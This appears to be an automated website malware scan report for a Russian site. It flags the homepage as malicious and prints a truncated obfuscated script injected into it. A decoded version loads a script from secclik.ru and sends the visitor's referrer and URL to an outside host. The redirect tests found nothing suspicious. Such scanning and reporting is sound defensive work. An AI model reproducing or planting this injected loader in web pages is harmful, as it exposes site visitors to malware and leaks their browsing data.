Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ksp.chel.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ksp.chel.ru/ | 200 OK Content-Length: 181125 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: secclik.ru var _110='==wOpkSZwF2YzV2XoUGchN2cl5WdoUGdpJ3duQnbl1Wdj9GZ7kSSJ9EKkxWaoNEZuVGcwFmLPBTSKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPBTSgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuUGdhN2c1ZmYvlXbukGch9yL6AHd0h2Jg0DIjJ3cukUSPpwOpcCdwlmcjN3JoQnbl1WZsVUZ0FWZyNmL05WZtV3YvRGI9ASSJ9EIyFmd7cSRzUCdwlmcjN3LDNTJFNTJyITJ2EDM3Q0MlQWaGNTJwhGcuIXZsRmb ...[978 bytes skipped]... Decoded script: var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.ru/handler.php%3Fid%3D7016%22%3E%3C/script%3E';var OII = document.createElement('script'); OII.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var I0O = document.getElementsByTagName('head')[0]; I0O.appendChild(OII);document.write(unescape(_escape)); var _escape='%3Cscript%20type%3D%22text/javascript%22%20%20src%3D%22http%3A//secclik.r ...[360 bytes skipped]... | ||
http://ksp.chel.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://ksp.chel.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 67244 Content-Type: application/javascript | clean |
http://ksp.chel.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 21090 Content-Type: application/javascript | clean |
http://secclik.ru/handler.php?id=7016 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://secclik.ru/test404page.js | 404 Not Found Content-Length: 570 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ksp.chel.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 25 Jan 2015 07:27:26 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7eks5004aiqvaq85u04m732kb0; path=/
GET / HTTP/1.1
Host: ksp.chel.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 25 Jan 2015 07:27:26 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7eks5004aiqvaq85u04m732kb0; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ksp.chel.ru
Referer: http://www.google.com/search?q=ksp.chel.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ksp.chel.ru
Referer: http://www.google.com/search?q=ksp.chel.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.